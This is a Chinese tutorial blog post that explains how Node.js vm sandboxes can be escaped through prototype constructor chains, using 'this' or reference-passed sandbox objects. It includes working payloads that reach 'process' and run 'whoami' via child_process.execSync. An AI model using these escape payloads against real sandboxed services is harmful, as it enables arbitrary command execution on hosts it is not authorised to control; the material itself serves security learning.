Nodejs沙箱绕过案例

最新推荐文章于 2024-06-13 10:03:50 发布
最新推荐文章于 2024-06-13 10:03:50 发布
阅读量92 收藏
点赞数
分类专栏: 安全 文章标签: 原型模式 javascript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57507186/article/details/132071469
版权
沙箱绕过核心原理

只要我们能在沙箱内部,找到一个沙箱外部的对象,借助这个对象内的属性即可获得沙箱外的函数,进而绕过沙箱。

沙箱源码如下:

const vm = require('vm');	//引入vm模块
const script = `m + n + x`; 	//要执行的代码
const sandbox = { m: 1, n: 2 , x: 3 };	  //传递的参数
const context = new vm.createContext(sandbox);   //创建沙箱环境
const res = vm.runInContext(script, context);	//执行沙箱
console.log(res)

这个沙箱环境有两种绕过方法,但在此之前我们来了解一点前置知识

  • JavaScript 通过构造函数生成新对象,因此构造函数可以视为对象的模板。实例对象的属性和方法,可以定义在构造函数内部。JavaScript 规定,每个函数都有一个原型对象(prototype)属性,指向一个对象,所有对象都有自己的原型对象(prototype)。由于原型对象也是对象,所以它也有自己的原型。原型对象的所有属性和方法,都能被实例对象共享。
    • prototype对象有一个constructor属性,默认指向prototype对象所在的构造函数。
  • this总是表示属性或方法“当前”所在的对象。如果对象的方法里面包含thisthis的指向就是方法运行时所在的对象。
一、通过this绕过

第一种是通过this 指向传给vm.createContext的那个对象,即sandbox,由于sandbox是在沙箱外创建的,所以this实际上指向的是window

因此,我们可以使用外部传入的对象,比如this来引入当前上下文里没有的模块,进而绕过这个隔离环境。比如定义script如下:

const vm = require('vm');
const script = `const process = this.toString.constructor('return process')() process.mainModule.require('child_process').execSync('whoami').toString()`; 
const sandbox = { m: 1, n: 2 , x: 3 };
const context = new vm.createContext(sandbox);
const res = vm.runInContext(script, context);
console.log(res)

this.toString获取到一个函数对象,this.toString.constructor获取到函数对象的构造器,构造器中可以传入字符串类型的代码。然后在执行,即可获得process对象。进而可以使用execSync函数来执行任意命令。

为什么不直接使用{}.toString.constructor('return process')(),却要使用this呢?

因为{}是在沙盒内的一个对象,而this是在沙盒外的对象(注入进来的)。沙盒内的对象即使使用这个方法,也获取不到process,因为它本身就没有process。

那么另一个问题,mn也是沙盒外的对象,为什么也不能用m.toString.constructor('return process')()呢?

这个原因就是因为数字、字符串、布尔等这些都是原始类型(primitive types),他们的传递其实传递的是值而不是引用,所以在沙盒内使用的m和外部那个m已经不是同一个m了,因此也是无法利用的。

但也引出了第二种方式,引用传递绕过。

二、通过引用传递绕过

如果修改{m: [], n: {}, x: /regexp/},并将原先this的位置替换。这样m、n、x就都可以利用了。因为数组、对象、正则,都是引用传递,能将外部环境引入进沙箱。

const vm = require('vm');
const script = `const process = x.toString.constructor('return process')() process.mainModule.require('child_process').execSync('whoami').toString()`; 
const sandbox = { m: [], n: {}, x: /regexp/ };
const context = new vm.createContext(sandbox);
const res = vm.runInContext(script, context);
console.log(res)
总结

这两个方法都是在沙箱内部引入了外部的环境,然后利用原型对象的constructor属性指向Function构造函数,来返回process对象,进而使用子进程(child_process)模块来执行任意命令。

小鹿乱创
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
温故知新:寻找新漏洞,绕过JS沙箱的限制
systemino的博客
06-14 460
表达式过滤掉一些数据。例如,我可以写出类似于book.price > 100这样的条件,并让该网站只显示出售价高于100美元的书。如果使用true作为过滤器,网站将会显示出所有的书籍,如果使用false,则不会显示出任何内容。所以,我能够知道我使用的表达式是真还是假。 这一功能引起了我的注意,所以我尝试传递更加复杂的表达式,例如:(1+1).toString()==="2"(结果为true...
node.js--vm沙箱逃逸初探
m0_62422842的博客
01-04 1987
前几天遇到一个考察vm沙箱逃逸的题目,由于这个点是第一次听说,所以就花时间了解了解什么是沙箱逃逸。此篇文章是对于自己初学vm沙箱逃逸的学习记录,若记录知识有误,欢迎师傅们指正。就只针对于node.js而言,沙箱和docker容器其实是差不多的,都是将程序与程序之间,程序与主机之间互相分隔开,但是沙箱是为了隔离有害程序的,避免影响到主机环境。为什么node.js语言要引入沙箱,这就要说说js语言中的作用域(也叫上下文)。------->输出undefined-------->输出100。
node漏洞 【持续更新】
weixin_51458899的博客
02-24 1625
node漏洞 持续更新
14万字面试题汇总整理,祝你顺利斩获大厂前端offer
热门推荐
孙叫兽的博客
07-17 1万+
Doctype的作用? 严格模式和混杂模式的区分,以及如何触发这2种模式? <!DOCTYPE>声明位于文档中的最前面,处于<html>标签之前。告知浏览器的解析器,用什么文档类型规范来解析这个文档。 DOCTYPE不存在或格式不正确会导致文档以混杂模式呈现。 严格模式就是浏览器根据web标准去解析页面,是—种要求严格的DTD(Document Type Definition),不允许使用任何表现层的语法, 混杂模式是—种向后兼容的解析方法。 触发标准模式或者说严格模...
「查漏补缺」2020 截止9月2日 秋招前端面试经历 (已整理答案)
超逸の学习技术博客
09-02 2414
成功是一个过程,并不是一个结果。励志做一位优秀的前端博主,今天分享最近的面试记录(含答案)
「前端996」腾讯-QQ音乐-面试经历(整理)
超逸の学习技术博客
09-02 1936
几个跨域的知识,直接干懵我了...
wuyun知识库目录
Grey的博客
01-15 7188
1269.利用Office宏及Powershell的针对性攻击样本分析2016-06-24 1268.SQL注入关联分析2016-06-24 1267.Android安全开发之ZIP文件目录遍历2016-06-23 1266.search-guard 在 Elasticsearch 2.3 上的运用2016-06-23 1265.签名加密破除-burp插件在app接口fuzz中的运用201
Node.js 修复多个漏洞,可导致RCE和HTTP请求走私
smellycat000的专栏
07-11 1531
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士Node.js 维护人员为JavaScript运行时环境中的七个漏洞发布修复方案。它们可导致任意代码执行和HTTP请求走私等攻击。其中,三个漏洞可导致HTTP请求走私,分别是传输-解码解析有权限漏洞(CVE-2022-32213)、标头字段的限定不当漏洞(CVE-2022-32214)以及不正确的多行传输-编码解析漏洞(...
Web-Security-Learning
Grey的博客
01-18 3164
Web-Security-Learning在学习Web安全的过程中整合的一些资料。 该repo会不断更新,最近更新日期为:2017/12/21。同步更新于: chybeta: Web-Security-Learning (带目录) 12月21日更新:新收录文章sql注入SQL注入的“冷门姿势”MySQL绕过WAF实战技巧NetSPI SQL Injection WikiXSSBrowser's X
nodejs-沙箱
03-04
参考: : Nodejs沙箱安装打开cmd并输入'node -v'来检查您的计算机是否安装了nodejs。 如果不是,请在这里下载并安装Node js。运行节点程序转到您的项目目录,并在cmd中写入节点{ur_js_fileName}创建服务器并侦听请求...
Noder-简单的基于Docker的NodeJS沙箱
08-10
Noder -简单的,基于Docker的NodeJS沙箱。用于测试代码并包含一个编辑器
cloudflare-bypass:NodeJS工具绕过Cloudflare iUam V2
04-28
绕云绕道 一个NodeJS工具绕过Cloudflare IUAM v2。这个怎么运作JS挑战( jsch )包含多个串联JavaScript挑战。 我正在尝试对所有这些进行逆向工程,在可以看到已经逆转的所有挑战。 验证码挑战可以在JS挑战之后提出...
nodejs案例
12-09
nodejs案例,源码下载nodejs案例,源码下载nodejs案例,源码下载nodejs案例,源码下载 就这样
sandbox:用于随机事物的 NodeJS 沙箱
06-29
我个人项目的沙箱,目前主要在 NodeJS 中。
原型模式--深复制/浅复制
最新发布
努力的小雨,一个阳光向上的博客不仅仅给你知识更希望带给你快乐
06-13 431
原型模式用于克隆复杂对象,由于new一个实例对象会消耗大部分时间,所以原型模式可以节约大量时间。11 Thu Jan 01 08:00:00 CST 1970 //只对s1修改。13 //深复制。4 //修改后。10 修改后。
C++获取Windows系统的各个磁盘盘符及容量信息(附源码)
dvlinker的技术专栏
06-11 117
C++获取Windows系统的各个磁盘盘符及容量信息(附源码)
设计模式-原型模式
明戈戈的博客
06-13 952
因此,使用Obiect.clone()方法只能浅层次的克隆,即只能对那些成员变量是基本类型或String类型的对象进行克隆,对那些成员变量是类类型的对象进行克隆要使用到对象的序列化,不然克降出来的 Prototype 对象都共享同一个 obj 实例。用面向对象的方法来说就是,我们先建立一个原型,然后通过对原型进行复制和修饰的方法,就可以产生一个与原型相似的新对象。从以上的使用可以看出,在Java中Prototype 模式变成 clone()方法的使用,此方法执行的是该对象的“浅复制”,而不“深复制”操作。
JavaScript面向对象
weixin_45951205的博客
06-12 854
面向过程就是分析出解决问题所需要的步骤,然后用函数把这些一步一步实现,使用的时候再一个一个依次调用就可以了。面向过程,就是按照我们分析好了的步骤,按照步骤解决问题。面向对象是把事务分解成为一个个对象,然后由对象之间分工与合作。面向对象的特性:封装性 继承性 多态性。
nodejs沙箱逃逸
09-11
具体来说,沙箱逃逸利用的是node.js中的漏洞或不当的配置,使攻击者能够绕过沙箱的限制,执行恶意代码或访问敏感资源。攻击者可能通过构造精心设计的输入,触发沙箱漏洞,从而获得对主机环境的不受限制的访问权限。 ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值